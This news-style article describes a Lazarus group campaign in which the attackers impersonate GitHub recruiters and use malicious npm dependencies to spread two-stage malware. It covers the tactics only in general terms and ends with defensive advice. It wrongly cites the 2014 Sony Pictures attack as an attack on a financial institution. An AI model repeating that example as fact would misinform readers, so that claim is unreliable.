North Korea’s state-sponsored advanced persistent threat (APT) group, Lazarus, known for its cyber espionage and financial fraud activities, has launched a new impersonation scam. This time, the group is posing as GitHub developers and recruiters, targeting a limited group of tech employees in social engineering attacks. Their objective is to spread malware through malicious node package manager (npm) dependencies, poisoning the software supply chain. This article delves into the details of this elaborate campaign and provides steps to protect against it.
The Lazarus APT Group: North Korea’s State-Sponsored Cyber Threat
Lazarus is a well-known APT group, believed to be operated by North Korea’s foreign intelligence and reconnaissance bureau. With a reputation for cyber espionage and financial fraud, Lazarus has consistently targeted various sectors worldwide.
Impersonation Scam: Lazarus Posing as GitHub Developers and Recruiters
In their latest campaign, Lazarus has adopted a new tactic by impersonating legitimate GitHub developers and recruiters. They create convincing personas and reach out to tech employees with genuine GitHub or social media accounts, disguising their malicious intent.
Social Engineering Attacks Targeting Tech Employees
Lazarus employs social engineering techniques to lure targets into joining GitHub development projects. They send invitations to tech employees, particularly those associated with the blockchain, cryptocurrency, online gambling, and cybersecurity sectors. Once the victims participate, they inadvertently expose themselves to malware attacks.
Malware Spread via Malicious npm Dependencies
The ultimate goal of the campaign is to trick victims into cloning and executing the contents of a GitHub repository that initiates a two-stage malware attack. Lazarus leverages npm packages to poison the software supply chain, infiltrating multiple applications with malicious code dependencies.
Lazarus: APT Known for Cyber Espionage and Financial Fraud
Lazarus stands out among APT groups for its cyber espionage activities. It has been responsible for various attacks on financial institutions, including the infamous attack on Sony Pictures in 2014. Its extensive capabilities and persistent operations make it a significant threat to cyberspace.
Targeting Accounts Connected to Blockchain, Cryptocurrency, and Online Gambling Sectors
To maximize its impact, Lazarus specifically targets developer accounts associated with sectors such as blockchain technology, cryptocurrencies, online gambling, and cybersecurity. These industries are increasingly vulnerable to cyber threats due to their interconnected and financially driven nature.
Campaign Aims to Spread Two-Stage Malware Attack Through GitHub Repositories
By enticing victims to clone and execute contents from seemingly legitimate GitHub repositories, Lazarus initiates a two-stage malware attack. The first stage introduces the initial infection, while the second stage establishes persistence and facilitates unauthorized access to the victim’s system.
Poisoning the Software Supply Chain with npm Packages
By leveraging npm packages, Lazarus can distribute malware on a wide scale. They achieve this by compromising legitimate packages or introducing malicious dependencies, thereby contaminating the software supply chain. This tactic not only enables their immediate attack but also has a long-lasting impact on the security of numerous applications and systems.
GitHub Takes Action: Suspends Accounts and Shares Indicators of Compromise
In response to Lazarus’ campaign, GitHub has taken swift action by suspending both the npm and GitHub accounts associated with the attack. They have also proactively shared indicators of compromise with the affected parties to help them identify and mitigate the threat.
Steps to Protect Against the Campaign: Review Security Logs and Be Cautious of Social Media Solicitations
To protect against Lazarus’ impersonation scam and malware campaign, individuals and organizations should review their security logs for any suspicious events. If targeted, they must promptly inform their employer’s cybersecurity department. Additionally, developers should exercise caution when receiving collaboration requests or npm package installations, particularly if related to the targeted industry sectors. Scrutinizing dependencies and installation scripts, especially those making network connections during installation, can help identify and prevent potential attacks.
The Lazarus APT group’s latest campaign, which involves impersonating GitHub developers and recruiters, poses a significant threat to tech employees associated with specific industry sectors. By using social engineering and compromising npm packages, Lazarus aims to spread a two-stage malware attack. It is crucial to remain vigilant, review security logs, and exercise caution when accepting collaboration requests or installing npm packages in order to mitigate the risks posed by this campaign. Proactive measures taken by platforms like GitHub serve as a reminder of the collective effort required to counter evolving cyber threats.